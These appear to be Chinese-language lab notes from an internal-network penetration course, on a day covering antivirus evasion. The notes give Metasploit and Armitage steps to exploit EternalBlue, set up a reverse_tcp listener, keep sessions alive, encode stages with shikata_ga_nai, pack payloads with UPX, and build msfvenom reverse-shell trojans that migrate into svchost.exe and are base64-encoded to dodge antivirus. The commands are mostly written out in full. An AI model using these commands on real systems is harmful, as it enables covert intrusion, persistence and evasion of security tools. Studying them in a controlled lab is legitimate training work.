免杀1

1. 会话提升的几种方式

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

内网渗透 day9-免杀基础

session -u 4      将shell会话提升成meterpreter会话

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

直接修改payload,原来的设置的payload为shell的木马也能连上

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

2. armitage的熟悉

apt-get install armitage       安装

内网渗透 day9-免杀基础

armitage   进入界面

内网渗透 day9-免杀基础

不用改直接进入

内网渗透 day9-免杀基础

选择快速查询

内网渗透 day9-免杀基础

输入要查询的地址

内网渗透 day9-免杀基础

nmap出来存活的主机有(1是物理电脑,2是网关,135是linux靶机,254是广播地址,128是win7靶机,129是本机)

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

拒绝访问打开服务管理器

内网渗透 day9-免杀基础

用所有的漏洞进行探测

内网渗透 day9-免杀基础内网渗透 day9-免杀基础

搜索ms17

内网渗透 day9-免杀基础

移过去

内网渗透 day9-免杀基础

存在永恒之蓝的漏洞

内网渗透 day9-免杀基础

进行渗透

内网渗透 day9-免杀基础

渗透成功

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

这里可以设置监听器

内网渗透 day9-免杀基础

3. handler生成监听器的方法

内网渗透 day9-免杀基础

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp

4. 防止会话假死

show advanced 显示高级参数设置

内网渗透 day9-免杀基础

set ExitOnSession false 监听到shell之后端口继续监听

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

set SessionCommunicationTimeout 0 设置会话存活时间,默认5分钟

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

set SessionExpirationTimeout 0 设置会话存活时间,默认一星期

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

5. 控制台设置编码

EnableStageEncoding 是否允许stage进行编码

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

StageEncoder 设置要用的编码

优秀的编码:x86/shikata_ga_nai、cmd/powershell_base64

内网渗透 day9-免杀基础

内网渗透 day9-免杀基础

6. upx加壳

加壳

内网渗透 day9-免杀基础

upx -9 qq.exe

-1压缩更快 -9压缩更好

-d解压 -l列表压缩文件

-t测试压缩文件 -V显示版本号

-h给予更多帮助 -L显示软件许可证

测试压缩文件能否运行

内网渗透 day9-免杀基础

upx -t qq.com            OK表示可以运行

7. msfvenom木马payload持久化

(会在运行木马的时候自动迁移到svchost.exe的对应进程中去)

内网渗透 day9-免杀基础

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

8. msfvenom木马编码

内网渗透 day9-免杀基础

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe

相关文章: